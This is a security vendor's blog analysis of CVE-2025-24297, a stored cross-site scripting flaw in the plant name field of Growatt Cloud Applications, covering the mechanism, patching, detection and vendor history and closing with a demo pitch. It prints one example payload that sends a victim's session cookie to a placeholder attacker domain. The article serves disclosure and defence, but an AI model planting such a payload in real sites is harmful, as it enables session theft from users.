Logic scanner now available! Try it out
Back
CVE Analysis - 7 min read

Growatt Cloud Applications at Risk: Unpacking CVE-2025-24297 Stored XSS Vulnerability

A critical stored XSS vulnerability (CVE-2025-24297) in Growatt Cloud Applications allows attackers to inject malicious JavaScript, posing severe risks to user privacy and system integrity.

ZeroPath Security Research

ZeroPath Security Research

2025-04-15
Growatt Cloud Applications at Risk: Unpacking CVE-2025-24297 Stored XSS Vulnerability

Growatt Cloud Applications at Risk: Unpacking CVE-2025-24297 Stored XSS Vulnerability

Introduction

Stored cross-site scripting (XSS) vulnerabilities remain among the most dangerous web application threats, capable of compromising user privacy, data integrity, and system security. Recently disclosed CVE-2025-24297 exposes Growatt Cloud Applications to severe risks, allowing attackers to inject malicious JavaScript directly into user-facing components. This flaw, rated critical with a CVSS v3.1 score of 9.8, demands immediate attention and remediation.

Affected Systems and Versions

Specific version details have not been disclosed publicly. Users of Growatt Cloud Applications should consult the vendor's advisory and apply available patches immediately to mitigate risk.

Technical Information

Vulnerability Mechanism

CVE-2025-24297 is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerability specifically affects the 'plant name' field within Growatt Cloud Applications, which lacks proper server-side input validation. Attackers exploit this by injecting malicious JavaScript payloads into the plant name, stored persistently within the application's database.

Attack Vectors and Exploitation Methods

Attackers can exploit this vulnerability by crafting malicious plant names such as:

<script>fetch('https://malicious.domain/steal-cookie?data='+document.cookie)</script>

When legitimate users access the compromised plant details, the stored script executes in their browsers, potentially exfiltrating session cookies, credentials, or manipulating user interactions.

Proof of Concept

Currently, no publicly available proof-of-concept exploit code has been disclosed for CVE-2025-24297.

Patch Information

Growatt has released patches addressing CVE-2025-24297. Users should immediately update to the latest version available from Growatt's official support channels. Specific version numbers and direct patch links have not been publicly disclosed; users should contact Growatt directly for detailed patching instructions.

Detection Methods

Detailed detection methods or indicators of compromise specific to CVE-2025-24297 have not been disclosed. However, monitoring web application logs for unusual plant name modifications containing script tags or JavaScript payloads is advised.

Vendor Security History

Growatt's security history includes multiple vulnerabilities related to inadequate input validation and authorization bypass, as highlighted in recent ICS advisories. This pattern suggests systemic security weaknesses within their cloud application architecture.

References

Conclusion

The disclosure of CVE-2025-24297 underscores the critical importance of rigorous input validation and secure coding practices. Organizations utilizing Growatt Cloud Applications must act swiftly to apply available patches and implement robust security measures to protect against potential exploitation. Vigilance and proactive security management remain essential to safeguarding critical infrastructure and user data.

Ready for effortless AppSec?

Get a live ZeroPath tour.

Schedule a demo with one of the founders Dean Valentine Raphael Karger Nathan Hrncirik Yaacov Tarko to get started.

Schedule a demo